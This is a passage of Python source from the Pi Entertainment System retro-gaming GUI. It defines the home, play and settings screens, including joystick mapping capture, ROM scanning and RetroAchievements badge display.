t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyPlayedLabel.y + self.__recentlyPlayedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyPlayedThumbPanels[console.getName()] = self.addUiObject(t)
def processEvent(self, event):
super(HomeScreen, self).processEvent(event)
if self.menuActive and event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_UP or event.key.keysym.sym == sdl2.SDLK_DOWN):
self.update()
elif not self.menuActive and self.menu.getSelectedItem().getText() == "Home" and event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_KP_ENTER or event.key.keysym.sym == sdl2.SDLK_RETURN):
self.setMenuActive(True)
def refreshMenu(self):
logging.debug("HomeScreen.refreshMenu: refreshing menu contents...")
items = self.menu.getItems()
for m in items:
if isinstance(m, ConsoleMenuItem):
logging.debug("HomeScreen.refreshMenu: removing %s" % m.getText())
self.menu.removeItem(m)
else:
logging.debug("HomeScreen.refreshMenu: not removing %s" % m.getText())
for c in self.app.consoles:
if c.getGameTotal() > 0:
consoleName = c.getName()
logging.debug("HomeScreen.refreshMenu: inserting %s" % consoleName)
menuLength = 5
if self.app.config.kodiCommand:
menuLength += 1
self.menu.insertItem(len(self.menu.getItems()) - menuLength, ConsoleMenuItem(c, False, False, self.app.setScreen, "Console %s" % consoleName))
# update recently added thumbnails
games = c.getRecentlyAddedGames(0, self.__showThumbs)
if consoleName not in self.__recentlyAddedThumbPanels:
if len(games) > 0:
t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyAddedLabel.y + self.__recentlyAddedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyAddedThumbPanels[consoleName] = self.addUiObject(t)
else:
self.__recentlyAddedThumbPanels[consoleName].setGames(games)
self.menu.setSelected(0, deselectAll=True)
self.__gamesAdded = self.app.getGameTotal() > 0
if self.__gamesAdded and self.app.achievementUser:
self.updateRecentBadges()
else:
if self.__gamesAdded:
self.__welcomeText = self.__gamesAddedWelcomeText
else:
self.__welcomeText = self.__noGamesAddedWelcomeText
self.update()
def stop(self):
super(HomeScreen, self).stop()
logging.debug("HomeScreen.stop: deleting textures...")
if self.__consoleTexture:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
def update(self):
selected = self.menu.getSelectedItem()
if isinstance(selected, ConsoleMenuItem):
console = selected.getConsole()
self.__consoleName = console.getName()
if self.__consoleTexture:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[self.__consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
self.__headerLabel.setText(self.__consoleName)
if self.__consoleName in self.__recentlyPlayedThumbPanels:
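# positioning assumes a console with recently played games also has recently added ones (a played game must have been added first)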
self.__recentlyPlayedLabel.y = self.__recentlyAddedThumbPanels[self.__consoleName].y + self.__recentlyAddedThumbPanels[self.__consoleName].height + 50
self.__recentlyPlayedLabel.setVisible(True)
self.__recentlyPlayedThumbPanels[self.__consoleName].setCoords(self.__recentlyPlayedThumbPanels[self.__consoleName].x, self.__recentlyPlayedLabel.y + self.__recentlyPlayedLabel.height + self.__thumbYGap)
else:
self.__recentlyPlayedLabel.setVisible(False)
self.__consoleSelected = True
else:
self.__consoleSelected = False
selectedText = selected.getText()
if selectedText == "Home":
self.__headerLabel.setText("Welcome to PES!")
self.__descriptionLabel.setText(self.__welcomeText, True)
elif selectedText == "Kodi":
self.__headerLabel.setText("Kodi")
self.__descriptionLabel.setText("Launch Kodi, the award winning media centre application.")
elif selectedText == "Reboot":
self.__headerLabel.setText("Reboot")
self.__descriptionLabel.setText("Select this menu item to reboot your system.", True)
elif selectedText == "Reload":
self.__headerLabel.setText("Reload")
self.__descriptionLabel.setText("Select this menu item to reload the PES GUI - handy if you have edited any config files.", True)
elif selectedText == "Exit":
self.__headerLabel.setText("Exit")
self.__descriptionLabel.setText("Select this menu item to exit the PES GUI and return to the command line.", True)
elif selectedText == "Settings":
self.__headerLabel.setText("Settings")
self.__descriptionLabel.setText("Select this menu item to customise PES and to add ROMs to PES' database.", True)
elif selectedText == "Power Off":
self.__headerLabel.setText("Power Off")
self.__descriptionLabel.setText("Select this menu item to power off your system.", True)
def updateRecentBadges(self):
if self.__gamesAdded and self.app.achievementUser:
logging.debug("HomeScreen.updateRecentBadges: updating...")
self.__welcomeText = "Welcome to PES %s.\n\nPoints: %d\nRank: %d" % (self.app.achievementUser.getName(), self.app.achievementUser.getTotalPoints(), self.app.achievementUser.getRank())
for b in self.__badgePanels:
self.removeUiObject(b)
b.destroy()
self.__badgePanels = []
badges = self.app.achievementUser.getRecentBadges(10)
if len(badges) == 0:
self.__welcomeText += "\n\nNo recent badges.\n\nYou may want to go to \"Update Badges\" under the \"Settings\" menu."
else:
self.__welcomeText += "\n\nYour recent badges:\n"
self.__descriptionLabel.setText(self.__welcomeText, True)
x = self.screenRect[0] + self.screenMargin
y = self.__descriptionLabel.y + self.__descriptionLabel.height + 20
width = self.screenRect[2] - (self.screenMargin * 2)
for b in badges:
badgePanel = self.addUiObject(BadgePanel(self.app.renderer, x, y, width, self.app.bodyFont, self.app.smallBodyFont, self.app.textColour, self.app.lightBackgroundColour, self.app.menuSelectedBgColour, b))
self.__badgePanels.append(badgePanel)
y += badgePanel.height + 10
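# stop adding panels once the next badge would overflow the bottom of the screen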
if y + badgePanel.height > self.screenRect[1] + self.screenRect[3]:
break
class PlayScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect, game):
super(PlayScreen, self).__init__(app, renderer, "Play", Menu([MenuItem("Play", False, False, self.__play), MenuItem("Browse")]), menuRect, screenRect)
self.__game = game
self.__consoleTexture = None
self.__titleLabel = None
self.__consoleName = None
self.__achievementsList = None
logging.debug("PlayScreen.init: intialised")
def drawScreen(self):
super(PlayScreen, self).drawScreen()
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__titleLabel.draw()
self.__achievementsList.draw()
def __play(self):
self.app.playGame(self.__game)
def processEvent(self, event):
super(PlayScreen, self).processEvent(event)
if not self.menuActive and not self.justActivated:
if self.menu.getSelectedItem().getText() == "Browse":
self.__achievementsList.setFocus(True)
self.__achievementsList.processEvent(event)
elif self.__achievementsList.hasFocus():
self.__achievementsList.setFocus(False)
elif self.__achievementsList.hasFocus():
self.__achievementsList.setFocus(False)
def setGame(self, game):
if game == self.__game:
return
achievementGame = self.app.achievementUser.getGame(game.getAchievementApiId())
if achievementGame == None:
logging.error("PlayScreen.setGame: could not find a game with achievement_api_id = %d" % game.getAchievementApiId())
self.app.exit(1)
self.__game = game
consoleName = game.getConsole().getName()
titleStr = "Game: %s\nProgress: %d%%\nPoints: %d of %d awarded" % (game.getName(), achievementGame.getPercentComplete(), achievementGame.getUserPointsTotal(), achievementGame.getScoreTotal())
if self.__titleLabel == None:
self.__titleLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], titleStr,
self.app.titleFont, self.app.textColour, fixedWidth=self.wrap))
else:
self.__titleLabel.setText(titleStr, True)
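# (re)create the console background texture only when the console has changed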
if self.__consoleTexture == None:
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
elif self.__consoleName != consoleName:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
self.__consoleName = consoleName
menu = Menu([])
badges = achievementGame.getBadges()
for b in badges:
menu.addItem(DataMenuItem(b, False, False, self.__play))
if self.__achievementsList == None:
y = self.__titleLabel.y + self.__titleLabel.height + 10
self.__achievementsList = self.addUiObject(IconPanelList(self.renderer, self.__titleLabel.x, y, self.screenRect[2] - (self.screenMargin * 2), self.screenRect[3] - y - self.screenMargin, menu, self.app.bodyFont, self.app.smallBodyFont, self.app.textColour, self.app.textColour, None, self.app.menuSelectedBgColour, List.SCROLLBAR_AUTO, True, False))
else:
self.__achievementsList.setMenu(menu)
class JoystickPromptMap(object):
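# Captures a single control-pad input (button, axis or hat) for a user-facing
# prompt and renders it as one field of an SDL2 game controller mapping string.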
BUTTON = 1
AXIS = 2
HAT = 3
AXIS_POSITIVE = 1
AXIS_NEGATIVE = -1
def __init__(self, prompt, sdlName):
self.__prompt = prompt
self.__sdlName = sdlName
self.reset()
def getPrompt(self):
return "Press: %s" % self.__prompt
def getInputTypeAsString(self):
if self.__inputType == None:
return "None"
if self.__inputType == self.BUTTON:
return "Button"
if self.__inputType == self.HAT:
return "Hat"
if self.__inputType == self.AXIS:
return "Axis"
return "Unknown!"
def getMap(self):
if self.__inputType == self.BUTTON:
return "%s:b%s" % (self.__sdlName, self.__value)
if self.__inputType == self.AXIS:
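# note: only the axis index is encoded; the captured direction is dropped (SDL mapping strings also accept +a/-a half-axis prefixes, unused here)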
axis, value = self.__value
return "%s:a%s" % (self.__sdlName, axis)
if self.__inputType == self.HAT:
hat, value = self.__value
return "%s:h%s.%s" % (self.__sdlName, hat, value)
return None
def getValue(self):
return self.__value
def getValueAsString(self):
if self.__inputType == self.HAT:
return "(Hat: %d %d)" % (self.__value[0], self.__value[1])
if self.__inputType == self.AXIS:
return "(Axis: %d %d)" % (self.__value[0], self.__value[1])
return "%s" % self.__value
def getType(self):
return self.__inputType
def reset(self):
self.__value = None
self.__inputType = None
def setValue(self, inputType, value):
self.__inputType = inputType
self.__value = value
logging.debug("JoystickPromptMap.setValue: name: %s, type: %s, value: %s" % (self.__sdlName, self.getInputTypeAsString(), self.getValueAsString()))
class SettingsScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect):
super(SettingsScreen, self).__init__(app, renderer, "Settings", Menu([
MenuItem("Update Games"),
MenuItem("Update Badges"),
MenuItem("Joystick Set-Up"),
MenuItem("Audio"),
MenuItem("Gameplay")]),
menuRect, screenRect)
if self.app.currentTimezone != None:
self.menu.addItem(MenuItem("Timezone"))
self.menu.addItem(MenuItem("Reset Database", False, False, app.resetDatabase))
self.menu.addItem(MenuItem("Reset Config", False, False, app.resetConfig))
self.menu.addItem(MenuItem("About"))
self.__hardcoreModeMenuItem = MenuItem("Hardcore mode", True, True)
self.__hardcoreModeMenuItem.toggle(self.app.config.retroAchievementsHardcore)
self.__init = True
self.__updateDatabaseMenu = Menu([])
for c in self.app.consoles:
self.__updateDatabaseMenu.addItem(ConsoleMenuItem(c, False, True))
self.__toggleMargin = 20
self.__updateDbThread = None
self.__updateAchievementsThread = None
self.__scanProgressBar = None
self.__defaultHeaderText = "Settings"
self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], self.__defaultHeaderText, self.app.titleFont, self.app.textColour))
logging.debug("SettingsScreen.init: initialised")
self.__initText = "Here you can scan for new games, sync your badges with www.retroachievements.org, set-up your joysticks as well as being able to reset PES to its default settings\n\nPlease select an item from the menu on the left."
self.__scanText = "Please use the menu below to select which consoles you wish to include in your search. By default all consoles are selected. Use the SELECT button to toggle the items in the menu.\n\nWhen you are ready, please select the \"Begin Scan\" button."
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__initText, self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
self.__consoleList = None
self.__scanButton = None
self.__selectAllButton = None
self.__deselectAllButton = None
self.__gameplaySaveButton = None
self.__audioSaveButton = None
self.__gamepadLayoutIcon = None
self.__jsIndex = None
self.__jsName = None
self.__jsPromptLabel = None
self.__jsPrompts = [
JoystickPromptMap("Start", "start"),
JoystickPromptMap("Select", "back"),
JoystickPromptMap("Up", "dpup"),
JoystickPromptMap("Down", "dpdown"),
JoystickPromptMap("Left", "dpleft"),
JoystickPromptMap("Right", "dpright"),
JoystickPromptMap("A", "a"),
JoystickPromptMap("B", "b"),
JoystickPromptMap("X", "x"),
JoystickPromptMap("Y", "y"),
JoystickPromptMap("L1", "leftshoulder"),
JoystickPromptMap("R1", "rightshoulder"),
JoystickPromptMap("L2", "lefttrigger"),
JoystickPromptMap("R2", "righttrigger"),
JoystickPromptMap("Left Axis Vertical", "lefty"),
JoystickPromptMap("Left Axis Horizontal", "leftx"),
JoystickPromptMap("Right Axis Vertical", "righty"),
JoystickPromptMap("Right Axis Horizontal", "rightx"),
JoystickPromptMap("Guide/Home", "guide")
]
self.__jsPromptLen = len(self.__jsPrompts)
self.__jsPrompt = 0
self.__joysticks = []
self.__ignoreJsEvents = True
self.__jsTimerTick = 0
self.__jsTimerLabel = None
self.__jsTimeOut = 10
self.__jsTimeRemaining = self.__jsTimeOut
self.__jsInitialAxis = []
self.__jsLastButton = None
self.__jsLastAxis = None
self.__jsLastHat = None
self.__jsLastHatValue = None
self.__jsLastEventTick = 0
self.__isBusy = False
self.__timezoneList = None
self.__gameplayList = None
self.__audioList = None
def drawScreen(self):
super(SettingsScreen, self).drawScreen()
self.__headerLabel.draw()
self.__descriptionLabel.draw()
if self.__init:
return
selected = self.menu.getSelectedItem().getText()
if selected == "Update Games":
if self.__updateDbThread != None:
if self.__updateDbThread.started and not self.__updateDbThread.done:
self.__descriptionLabel.setText("Scanned %d out of %d roms... press BACK to abort\n\nElapsed: %s\n\nRemaining: %s\n\nProgress:" % (self.__updateDbThread.getProcessed(), self.__updateDbThread.romTotal, self.__updateDbThread.getElapsed(), self.__updateDbThread.getRemaining()), True)
self.__scanProgressBar.y = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__scanProgressBar.setProgress(self.__updateDbThread.getProgress())
self.__scanProgressBar.draw()
elif self.__updateDbThread.done:
interruptedStr = ""
if self.__updateDbThread.interrupted:
interruptedStr = "(scan interrupted)"
self.__descriptionLabel.setText("Scan completed in %s %s\n\nAdded: %d\n\nUpdated: %d\n\nDeleted: %d\n\nPress BACK to return to the previous screen." % (self.__updateDbThread.getElapsed(), interruptedStr, self.__updateDbThread.added, self.__updateDbThread.updated, self.__updateDbThread.deleted), True)
self.__isBusy = False
else:
self.__consoleList.draw()
self.__scanButton.draw()
self.__selectAllButton.draw()
self.__deselectAllButton.draw()
elif selected == "Update Badges":
if self.app.retroAchievementConn:
if self.__updateAchievementsThread != None:
if self.__updateAchievementsThread.started and not self.__updateAchievementsThread.done:
self.__descriptionLabel.setText("Processed %d out of %d games... press BACK to abort\n\nElapsed: %s\n\nRemaining: %s\n\nProgress:" % (self.__updateAchievementsThread.getProcessed(), self.__updateAchievementsThread.getTotal(), self.__updateAchievementsThread.getElapsed(), self.__updateAchievementsThread.getRemaining()), True)
self.__scanProgressBar.y = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__scanProgressBar.setProgress(self.__updateAchievementsThread.getProgress())
self.__scanProgressBar.draw()
elif self.__updateAchievementsThread.done:
interruptedStr = ""
if self.__updateAchievementsThread.interrupted:
interruptedStr = "(scan interrupted)"
self.__descriptionLabel.setText("Scan completed in %s %s\n\nProcessed %d badges\n\nPress BACK or HOME to continue." % (self.__updateAchievementsThread.getElapsed(), interruptedStr, self.__updateAchievementsThread.getBadgeTotal()), True)
self.__isBusy = False
self.__descriptionLabel.draw()
elif selected == "Timezone":
self.__descriptionLabel.draw()
if self.__timezoneList:
self.__timezoneList.draw()
elif selected == "Gameplay":
self.__descriptionLabel.draw()
if self.__gameplayList:
self.__gameplayList.draw()
if self.__gameplaySaveButton:
self.__gameplaySaveButton.draw()
elif selected == "Audio":
self.__descriptionLabel.draw()
if self.__audioList:
self.__audioList.draw()
if self.__audioSaveButton:
self.__audioSaveButton.draw()
elif selected == "Joystick Set-Up":
if self.__jsTimeRemaining > -1 and self.__jsPrompt < self.__jsPromptLen:
tick = sdl2.SDL_GetTicks()
poll = self.__jsPrompt > 0
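# polling only starts once the first prompt has a value; that value doubles as the "skip" button below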
if tick - self.__jsTimerTick > 1000:
self.__jsTimerTick = tick
self.__jsTimeRemaining -= 1
self.__jsTimerLabel.setText("Timeout in: %ds" % self.__jsTimeRemaining)
if self.__jsTimeRemaining == 0:
# trigger back event
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = sdl2.SDLK_BACKSPACE
sdl2.SDL_PushEvent(e)
self.__jsTimeRemaining = -1
poll = False
if poll:
# check buttons
value = None
js = self.__joysticks[self.__jsIndex]
for i in xrange(sdl2.SDL_JoystickNumButtons(js)):
if sdl2.SDL_JoystickGetButton(js, i) == 1 and sdl2.SDL_GetTicks() - self.__jsLastEventTick > 500:
value = i
self.__jsLastButton = value
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
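# pressing the button assigned to the first prompt skips the current prompt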
if value == self.__jsPrompts[0].getValue():
logging.debug("SettingsScreen.draw: skipping button %s" % self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
else:
btnOk = True
# have we already used this button value?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.BUTTON and p.getValue() == value:
logging.warning("SettingsScreen.draw: this button has already been assigned")
btnOk = False
break
if btnOk:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.BUTTON, value)
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
else:
# do hats
for i in xrange(sdl2.SDL_JoystickNumHats(js)):
hvalue = sdl2.SDL_JoystickGetHat(js, i)
# ignore diagonal hat buttons
if sdl2.SDL_GetTicks() - self.__jsLastEventTick > 500 and hvalue != sdl2.SDL_HAT_CENTERED and hvalue != sdl2.SDL_HAT_RIGHTUP and hvalue != sdl2.SDL_HAT_RIGHTDOWN and hvalue != sdl2.SDL_HAT_LEFTUP and hvalue != sdl2.SDL_HAT_LEFTDOWN and (i != self.__jsLastHat or (i == self.__jsLastHat and hvalue != self.__jsLastHatValue)):
value = hvalue
self.__jsLastHat = i
self.__jsLastHatValue = hvalue
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
hatOk = True
# have we already assigned this hat?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.HAT:
h, v = p.getValue()
if h == self.__jsLastHat and v == value:
logging.warning("SettingsScreen.draw: this hat has already been assigned")
hatOk = False
break
if hatOk:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.HAT, (self.__jsLastHat, value))
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
elif sdl2.SDL_GetTicks() - self.__jsLastEventTick > 750:
# check axis
for i in xrange(sdl2.SDL_JoystickNumAxes(js)):
avalue = sdl2.SDL_JoystickGetAxis(js, i)
if (avalue < JOYSTICK_AXIS_MIN or avalue > JOYSTICK_AXIS_MAX) and avalue != self.__jsInitialAxis[i]:
value = i
self.__jsLastAxis = value
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
axisOk = True
# have we already used this axis value?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.AXIS:
a, v = p.getValue()
if a == value and ((avalue < JOYSTICK_AXIS_MIN and v == JoystickPromptMap.AXIS_NEGATIVE) or (avalue > JOYSTICK_AXIS_MAX and v == JoystickPromptMap.AXIS_POSITIVE)):
logging.warning("SettingsScreen.draw: this axis has already been assigned")
axisOk = False
break
if axisOk:
if avalue < JOYSTICK_AXIS_MIN:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.AXIS, (value, JoystickPromptMap.AXIS_NEGATIVE))
else:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.AXIS, (value, JoystickPromptMap.AXIS_POSITIVE))
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
if self.__jsPrompt == self.__jsPromptLen:
logging.debug("SettingsScreen.draw: joystick configuration complete!")
self.__jsPromptLabel.setVisible(False)
self.__jsTimerLabel.setVisible(False)
self.__ignoreJsEvents = True
self.app.doJsToKeyEvents = True
errors = []
jsGUID = getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(self.__jsIndex))
logging.debug("SettingsScreen.draw: creating SDL2 controller mapping using GUID: %s" % jsGUID)
# remove commas from the name
jsName = self.__jsName.replace(",", " ")
jsMap = [jsGUID, jsName]
for p in self.__jsPrompts:
m = p.getMap()
if m:
jsMap.append(m)
jsMapStr = ','.join(jsMap)
logging.debug("SettingsScreen.draw: map: %s" % jsMapStr)
for j in self.__joysticks:
sdl2.SDL_JoystickClose(j)
rtn = sdl2.SDL_GameControllerAddMapping(jsMapStr)
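# SDL_GameControllerAddMapping returns 1 when a new mapping is added, 0 when an existing one is updated and -1 on error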
if rtn == 0 or rtn == 1:
logging.debug("SettingsScreen.draw: mapping loaded OK!")
try:
db = GameControllerDb(userGameControllerFile)
db.load()
if db.add(jsMapStr):
db.save()
else:
errors.append("Unable to save control pad mapping to file!")
logging.error("SettingsScreen.draw: unable to add mapping to %s" % userGameControllerFile)
except IOError as e:
logging.error(e)
else:
errors.append("Could not add SDL2 mapping for control pad!")
logging.error("SettingsScreen.draw: SDL_GameControllerAddMapping failed for joystick %d, %s" % (self.__jsIndex, self.__jsName))
if len(errors) == 0:
self.app.updateControlPad(self.__jsIndex)
self.__descriptionLabel.setText("Configuration complete. Please press the BACK button to return to the previous menu.")
else:
self.__descriptionLabel.setText("Configuration failed with the following errors:\n\n%s" % "\n".join(errors))
self.__jsPromptLabel.draw()
self.__jsTimerLabel.draw()
self.__gamepadLayoutIcon.draw()
def isBusy(self):
return self.__isBusy
def processEvent(self, event):
selected = self.menu.getSelectedItem().getText()
oldMenuActive = self.menuActive # store state before parent method changes it!
# don't pass up the event if a games scan is in progress
if event.type == sdl2.SDL_KEYDOWN and selected == "Update Games" and self.__updateDbThread != None:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE or event.key.keysym.sym == sdl2.SDLK_HOME:
if self.__updateDbThread.started and not self.__updateDbThread.done:
self.setMenuActive(False)
self.__updateDbThread.stop()
elif self.__updateDbThread.done:
self.setMenuActive(False)
self.__updateDbThread = None
self.__descriptionLabel.setText(self.__scanText, True)
self.__scanButton.setFocus(False)
self.__consoleList.setFocus(True)
self.__updateDatabaseMenu.toggleAll(True)
self.__updateDatabaseMenu.setSelected(0)
if event.key.keysym.sym == sdl2.SDLK_HOME:
self.__reset()
return
elif event.type == sdl2.SDL_KEYDOWN and selected == "Update Badges" and self.__updateAchievementsThread != None:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE or event.key.keysym.sym == sdl2.SDLK_HOME:
if self.__updateAchievementsThread.started and not self.__updateAchievementsThread.done:
self.setMenuActive(False)
self.__updateAchievementsThread.stop()
elif self.__updateAchievementsThread.done:
self.__updateAchievementsThread = None
if event.key.keysym.sym == sdl2.SDLK_HOME:
self.__reset()
super(SettingsScreen, self).processEvent(event)
if oldMenuActive:
if event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER):
logging.debug("SettingsScreen.processEvent: return key trapped for %s" % selected)
if selected == "Update Games":
self.__headerLabel.setText(selected)
self.__updateDatabaseMenu.toggleAll(True)
self.__descriptionLabel.setText(self.__scanText, True)
if self.__consoleList != None:
self.__consoleList.destroy()
consoleListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__consoleList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, consoleListY, 300, self.screenRect[3] - consoleListY, self.__updateDatabaseMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour))
self.__consoleList.setFocus(True)
self.__updateDatabaseMenu.setSelected(0)
if self.__scanButton == None:
self.__scanButton = self.addUiObject(Button(self.renderer, self.__consoleList.x + self.__consoleList.width + 200, self.__consoleList.y, 150, 50, "Begin Scan", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.startScan))
self.__selectAllButton = self.addUiObject(Button(self.renderer, self.__scanButton.x, self.__scanButton.y + self.__scanButton.height + 10, 150, 50, "Select All", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__updateDatabaseMenu.toggleAll, True))
self.__deselectAllButton = self.addUiObject(Button(self.renderer, self.__scanButton.x, self.__selectAllButton.y + self.__selectAllButton.height + 10, 150, 50, "Deselect All", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__updateDatabaseMenu.toggleAll, False))
self.__scanButton.setFocus(False)
elif selected == "Update Badges":
if not self.app.retroAchievementConn:
self.__descriptionLabel.setText("To track your achievements in your games, please enter your www.retroachievements.org username, password and API key into \\pes\config\pes\pes.ini or %s and then reload PES." % userPesConfigFile)
else:
self.__descriptionLabel.setText("Preparing to synchronise PES with your www.retroachievements.org account...")
if not self.__updateAchievementsThread:
self.__updateAchievementsThread = RetroAchievementsUpdateThread(self.app.retroAchievementConn, self.app.config.badgeDir)
if self.__scanProgressBar == None:
self.__scanProgressBar = ProgressBar(self.renderer, self.screenRect[0] + self.screenMargin, self.__descriptionLabel.y + self.__descriptionLabel.height + 10, self.screenRect[2] - (self.screenMargin * 2), 40, self.app.lineColour, self.app.menuBackgroundColour)
else:
self.__scanProgressBar.setProgress(0)
self.__isBusy = True
self.__updateAchievementsThread.start()
elif selected == "Timezone":
self.__descriptionLabel.setText("You can change the current timezone from \"%s\" by selecting one from the list below." % self.app.currentTimezone, True)
if self.__timezoneList == None:
menuItems = []
for t in self.app.timezones:
menuItems.append(MenuItem(t, False, False, self.__setTimezone, t))
timezoneMenu = Menu(menuItems)
timezoneListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__timezoneList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, timezoneListY, 300, self.screenRect[3] - timezoneListY, timezoneMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, drawBackground=True))
self.__timezoneList.setFocus(True)
elif selected == "Gameplay":
self.__descriptionLabel.setText("Gameplay settings can be modified below.", True)
if self.__gameplayList == None:
menuItems = []
menuItems.append(self.__hardcoreModeMenuItem)
gamePlayMenu = Menu(menuItems)
gamePlayListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__gameplayList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x, gamePlayListY, 300, self.screenRect[3] - gamePlayListY, gamePlayMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, graphicalToggle=False))
if self.__gameplaySaveButton == None:
screenDimensions = self.app.getDimensions()
self.__gameplaySaveButton = self.addUiObject(Button(self.renderer, screenDimensions[0] - 160, screenDimensions[1] - 60, 150, 50, "Save", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.saveSettings))
self.__gameplayList.setFocus(True)
elif selected == "Audio":
self.__descriptionLabel.setText("Select the audio device to use.", True)
if self.__audioList == None:
menuItems = []
pcms = alsaaudio.pcms()
pcms.sort()
for a in pcms:
if a != 'null':
m = MenuItem(a, False, True)
if a == self.app.config.audioDevice:
m.toggle(True)
menuItems.append(m)
audioMenu = Menu(menuItems, False)
audioListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__audioList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, audioListY, 500, self.screenRect[3] - audioListY, audioMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, drawBackground=True))
if self.__audioSaveButton == None:
screenDimensions = self.app.getDimensions()
self.__audioSaveButton = self.addUiObject(Button(self.renderer, screenDimensions[0] - 160, screenDimensions[1] - 60, 150, 50, "Save", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.saveSettings))
self.__audioList.setFocus(True)
elif selected == "About":
self.__headerLabel.setText(selected)
self.__descriptionLabel.setText("Pi Entertainment System version %s\n\nReleased: %s\n\nLicense: Licensed under version 3 of the GNU Public License (GPL)\n\nAuthor: %s\n\nContributors: Eric Smith\n\nCover art: theGamesDB.net\n\nDocumentation: http://pes.mundayweb.com\n\nFacebook: https://www.facebook.com/pientertainmentsystem\n\nHelp: pes@mundayweb.com\n\nIP Address: %s" % (VERSION_NUMBER, VERSION_DATE, VERSION_AUTHOR, self.app.ip), True)
elif selected == "Joystick Set-Up":
self.app.doJsToKeyEvents = False
self.__jsIndex = None
self.__jsFirstPass = True
self.__jsTimeRemaining = self.__jsTimeOut
self.__jsPrompt = 0
self.__joysticks = []
self.__jsInitialAxis = []
for p in self.__jsPrompts:
p.reset()
self.__headerLabel.setText(selected)
